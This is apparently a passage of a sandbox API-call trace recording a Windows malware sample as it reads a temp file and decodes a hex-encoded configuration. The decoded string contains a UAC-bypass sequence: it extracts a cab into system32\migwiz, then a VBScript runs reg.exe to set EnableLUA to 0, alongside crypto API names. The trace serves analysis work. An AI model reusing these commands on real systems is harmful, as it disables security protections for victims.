0x24991d8 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24991f0 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbc0 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499208 [0133.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499220 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499238 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbc0 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d720 [0133.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x2400048 [0133.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499250 [0133.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb70 [0133.253] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\rngoajj" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\rngoajj"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0133.253] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.253] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bef4c | out: lpNewFilePointer=0x0) returned 1 [0133.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x249f8f8 [0133.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbf0 [0133.253] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bef60 | out: lpNewFilePointer=0x0) returned 1 [0133.253] ReadFile (in: hFile=0x160, lpBuffer=0x2400048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bef74, lpOverlapped=0x0 | out: lpBuffer=0x2400048*, lpNumberOfBytesRead=0x8bef74*=0x2a7d, lpOverlapped=0x0) returned 1 [0133.254] ReadFile (in: hFile=0x160, lpBuffer=0x2400048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bef74, lpOverlapped=0x0 | out: lpBuffer=0x2400048*, lpNumberOfBytesRead=0x8bef74*=0x0, lpOverlapped=0x0) returned 1 [0133.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f8f8 | out: hHeap=0x25c0000) returned 1 [0133.254] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.254] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bef58 | out: lpNewFilePointer=0x0) returned 1 [0133.254] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.254] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bef58 | out: lpNewFilePointer=0x0) returned 1 [0133.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499268 [0133.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbf0 [0133.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499280 [0133.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb50 [0133.254] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bef1c | out: lpNewFilePointer=0x0) returned 1 [0133.254] ReadFile (in: hFile=0x160, lpBuffer=0x2400048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bef30, lpOverlapped=0x0 | out: lpBuffer=0x2400048*, lpNumberOfBytesRead=0x8bef30*=0x2a7d, lpOverlapped=0x0) returned 1 [0133.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x2465a78 [0133.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499280 | out: hHeap=0x25c0000) returned 1 [0133.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x2420730 [0133.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2465a78 | out: hHeap=0x25c0000) returned 1 [0133.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x24207a8 [0133.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420730 | out: hHeap=0x25c0000) returned 1 [0133.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1f0) returned 0x24208a0 [0133.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207a8 | out: hHeap=0x25c0000) returned 1 [0133.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3f0) returned 0x2420a98 [0133.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24208a0 | out: hHeap=0x25c0000) returned 1 [0133.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7f0) returned 0x25ceba8 [0133.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420a98 | out: hHeap=0x25c0000) returned 1 [0133.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xff0) returned 0x2410050 [0133.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ceba8 | out: hHeap=0x25c0000) returned 1 [0133.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1ff0) returned 0x2411048 [0133.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2410050 | out: hHeap=0x25c0000) returned 1 [0133.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3ff0) returned 0x2413040 [0133.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2411048 | out: hHeap=0x25c0000) returned 1 [0133.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x2413040, cbMultiByte=10878, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10878 [0133.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x54fc) returned 0x249f8f8 [0133.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x2413040, cbMultiByte=10878, lpWideCharStr=0x249f8f8, cchWideChar=10878 | out: lpWideCharStr="203120]15D!20323420]15D!202D32363834333534353620]15D!203120]15D!203120]15D!20333237373120]15D!20323631313320]15D!203020]15D!203320]15D!203020]15D!41647661706933322E646C6C]15D!203120]15D!203020]15D!20404F5356657273696F6E20]15D!57494E5F32303030]15D!626F6F6C]15D!437279707441637175697265436F6E74657874]15D!68616E646C652A]15D!203020]15D!707472]15D!203020]15D!707472]15D!203020]15D!64776F7264]15D!64776F7264]15D!203020]15D!203220]15D!203020]15D!203120]15D!203020]15D!626F6F6C]15D!437279707452656C65617365436F6E74657874]15D!68616E646C65]15D!64776F7264]15D!203020]15D!626F6F6C]15D!437279707443726561746548617368]15D!68616E646C65]15D!75696E74]15D!707472]15D!203020]15D!64776F7264]15D!203020]15D!68616E646C652A]15D!203020]15D!203020]15D!203120]15D!203120]15D!203520]15D!627974655B]15D!5D]15D!203120]15D!626F6F6C]15D!43727970744861736844617461]15D!68616E646C65]15D!7374727563742A]15D!64776F7264]15D!64776F7264]15D!203020]15D!203220]15D!203120]15D!626F6F6C]15D!43727970744465726976654B6579]15D!68616E646C65]15D!75696E74]15D!68616E646C65]15D!64776F7264]15D!68616E646C652A]15D!203020]15D!203020]15D!203320]15D!203120]15D!203020]15D!203520]15D!203020]15D!626F6F6C]15D!437279707444657374726F7948617368]15D!68616E646C65]15D!203020]15D!626F6F6C]15D!437279707444657374726F794B6579]15D!68616E646C65]15D!203020]15D!203120]15D!203020]15D!203020]15D!203020]15D!203120]15D!203120]15D!626F6F6C]15D!4372797074456E6372797074]15D!68616E646C65]15D!68616E646C65]15D!203020]15D!626F6F6C]15D!64776F7264]15D!203020]15D!707472]15D!203020]15D!64776F72642A]15D!64776F7264]15D!203020]15D!203020]15D!203220]15D!203120]15D!203620]15D!627974655B]15D!5D]15D!203120]15D!626F6F6C]15D!4372797074456E6372797074]15D!68616E646C65]15D!68616E646C65]15D!203020]15D!626F6F6C]15D!64776F7264]15D!203020]15D!7374727563742A]15D!64776F72642A]15D!64776F7264]15D!203020]15D!203320]15D!203120]15D!203020]15D!203120]15D!203020]15D!203020]15D!203020]15D!203120]15D!203120]15D!20313620]15D!203220]15D!203120]15D!20323620]15D!203320]15D!203120]15D!203130323420]15D!203130323420]15D!203420]15D!203120]15D!203220]15D!203520]15D!203120]15D!203220]15D!203120]15D!203120]15D!203020]15D!203020]15D!203020]15D!203120]15D!203020]15D!203020]15D!203020]15D!203120]15D!203120]15D!203120]15D!203220]15D!203220]15D!7C]15D!5B5C5C2F5D2B5C7A]15D!5C]15D!203120]15D!203120]15D!5B5C5C2F3A3E3C5C7C5D7C283F73295C415C732A5C7A]15D!203220]15D!203220]15D!203020]15D!203120]15D!203220]15D!203320]15D!203320]15D!203420]15D!203420]15D!203120]15D!203220]15D!203420]15D!203420]15D!203120]15D!7C]15D!203120]15D!203120]15D!2032353620]15D!203831393220]15D!20333237363820]15D!203820]15D!203820]15D!203820]15D!7573657233322E646C6C]15D!626F6F6C]15D!53797374656D506172616D6574657273496E666F57]15D!75696E74]15D!75696E74]15D!707472]15D!75696E74]15D!203020]15D!20323020]15D!204054656D7044697220]15D!2F776C2E6A7067]15D!203020]15D!204074656D7064697220]15D!204074656D7064697220]15D!204054656D7044697220]15D!5C3838382E766273]15D!2033303020]15D!20404F534172636820]15D!583836]15D!2040436F6D5370656320]15D!202F63207775736120]15D!204054656D7044697220]15D!5C33322E636162202F7175696574202F657874726163743A]15D!204057696E646F777344697220]15D!5C73797374656D33325C6D696777697A5C2020262065786974]15D!204054656D7044697220]15D!204053575F4849444520]15D!204054656D7044697220]15D!5C3838382E766273]15D!46696C65203D2022433A5C57696E646F77735C53797374656D33325C636D642E65786522]15D!204043524C4620]15D!5365742073686C6C203D204372656174654F626A6563742822577363726970742E5368656C6C2229]15D!204043524C4620]15D!73686C6C2E72756E2822433A5C57696E646F77735C53797374656D33325C6D696777697A5C6D696777697A2E657865202220262046696C6520262022202F63202577696E646972255C53797374656D33325C7265672E6578652041444420484B4C4D5C534F4654574152455C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C506F6C69636965735C53797374656D202F7620456E61626C654C5541202F74205245475F44574F5244202F6420]15D!30]15D!202F6622292C302C66616C7365]15D!203230303020]15D!204054656D7044697220]15D!5C3838382E766273]15D!20404F534172636820]15D!583634]15D!2040436F6D5370656320]15D!202F63207775736120]15D!204054656D7044697220]15D!5C36342E636162202F7175696574202F657874726163743A]15D!204057696E646F777344697220]15D!5C73797374656D33325C6D696777697A5C20262065786974]15D!204054656D7044697220]15D!204053575F4849444520]15D!204054656D7044697220]15D!5C3838382E766273]15D!46696C65203D2022433A5C57696E646F77735C53797374656D33325C636D642E65786522]15D!204043524C4620]15D!5365742073686C6C203D204372656174654F626A6563742822577363726970742E5368656C6C2229]15D!204043524C4620]15D!73686C6C2E72756E2822433A5C57696E646F77735C53797374656D33325C6D696777697A5C6D696777697A2E657865202220262046696C6520262022202F63202577696E646972255C53797374656D33325C7265672E6578652041444420484B4C4D5C534F4654574152455C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C506F6C69636965735C53797374656D202F7620456E61626C654C5541202F74205245475F44574F5244202F6420]15D!30]15D!202F6622292C302C66616C7365]15D!203230303020]15D!204054656D7044697220]15D!5C3838382E766273]15D!6B65726E656C33322E646C6C]15D!626F6F6C65616E]15D!576F773634456E61626C65576F77363446735265646972656374696F6E]15D!626F6F6C65616E]15D!203020]15D!20") returned 10878 [0133.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499268 | out: hHeap=0x25c0000) returned 1 [0133.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5500) returned 0x24a4e00 [0133.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f8f8 | out: hHeap=0x25c0000) returned 1 [0133.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2413040 | out: hHeap=0x25c0000) returned 1 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb50 | out: hHeap=0x25c0000) returned 1 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499238 | out: hHeap=0x25c0000) returned 1 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499220 | out: hHeap=0x25c0000) returned 1 [0133.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499220 [0133.258] CloseHandle (hObject=0x160) returned 1 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499250 | out: hHeap=0x25c0000) returned 1 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb70 | out: hHeap=0x25c0000) returned 1 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2400048 | out: hHeap=0x25c0000) returned 1 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499208 | out: hHeap=0x25c0000) returned 1 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24991f0 | out: hHeap=0x25c0000) returned 1 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24991d8 | out: hHeap=0x25c0000) returned 1 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb60 | out: hHeap=0x25c0000) returned 1 [0133.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24991d8 [0133.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb60 [0133.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24991f0 [0133.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb60 | out: hHeap=0x25c0000) returned 1 [0133.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499208 [0133.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb60 [0133.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb60 | out: hHeap=0x25c0000) returned 1 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x54fc) returned 0x249f8f8 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb60 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2420730 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x844) returned 0x25ceba8 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb70 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499250 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499238 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499268 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbc0 [0133.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499268 | out: hHeap=0x25c0000) returned 1 [0133.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499238 | out: hHeap=0x25c0000) returned 1 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499238 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499268 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499280 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbc0 [0133.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499280 | out: hHeap=0x25c0000) returned 1 [0133.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499268 | out: hHeap=0x25c0000) returned 1 [0133.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499268 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbc0 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dca0 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499280 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499298 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24992b0 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb50 [0133.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24992b0 | out: hHeap=0x25c0000) returned 1 [0133.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb50 | out: hHeap=0x25c0000) returned 1 [0133.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499298 | out: hHeap=0x25c0000) returned 1 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499298 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb50 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d078 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24992b0 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24992c8 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24992e0 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bba0 [0133.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24992e0 | out: hHeap=0x25c0000) returned 1 [0133.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bba0 | out: hHeap=0x25c0000) returned 1 [0133.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24992c8 | out: hHeap=0x25c0000) returned 1 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24992c8 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bba0 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24992e0 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24992f8 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499310 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499328 [0133.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb80 [0133.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499328 | out: hHeap=0x25c0000) returned 1 [0133.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb80 | out: hHeap=0x25c0000) returned 1 [0133.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499310 | out: hHeap=0x25c0000) returned 1 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499310 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb80 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499328 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499340 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499358 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499370 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb30 [0133.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499370 | out: hHeap=0x25c0000) returned 1 [0133.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb30 | out: hHeap=0x25c0000) returned 1 [0133.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499358 | out: hHeap=0x25c0000) returned 1 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499358 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb30 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249da98 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499370 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499388 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24993a0 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb40 [0133.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24993a0 | out: hHeap=0x25c0000) returned 1 [0133.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb40 | out: hHeap=0x25c0000) returned 1 [0133.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499388 | out: hHeap=0x25c0000) returned 1 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499388 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb40 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dac0 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24993a0 [0133.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24993b8 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24993d0 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb90 [0133.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24993d0 | out: hHeap=0x25c0000) returned 1 [0133.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb90 | out: hHeap=0x25c0000) returned 1 [0133.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24993b8 | out: hHeap=0x25c0000) returned 1 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24993b8 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb90 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24993d0 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24993e8 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499400 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499418 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bca0 [0133.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499418 | out: hHeap=0x25c0000) returned 1 [0133.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bca0 | out: hHeap=0x25c0000) returned 1 [0133.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499400 | out: hHeap=0x25c0000) returned 1 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499400 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bca0 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499418 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499430 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499448 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499460 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bcd0 [0133.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499460 | out: hHeap=0x25c0000) returned 1 [0133.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bcd0 | out: hHeap=0x25c0000) returned 1 [0133.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499448 | out: hHeap=0x25c0000) returned 1 [0133.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499448 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bcd0 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499460 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499478 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499490 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24994a8 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bcc0 [0133.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24994a8 | out: hHeap=0x25c0000) returned 1 [0133.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bcc0 | out: hHeap=0x25c0000) returned 1 [0133.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499490 | out: hHeap=0x25c0000) returned 1 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499490 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bcc0 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d0c0 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24994a8 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x248a890 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x248a848 [0133.263] RtlAllocateHeap (HeapHandle=0x25c0000, 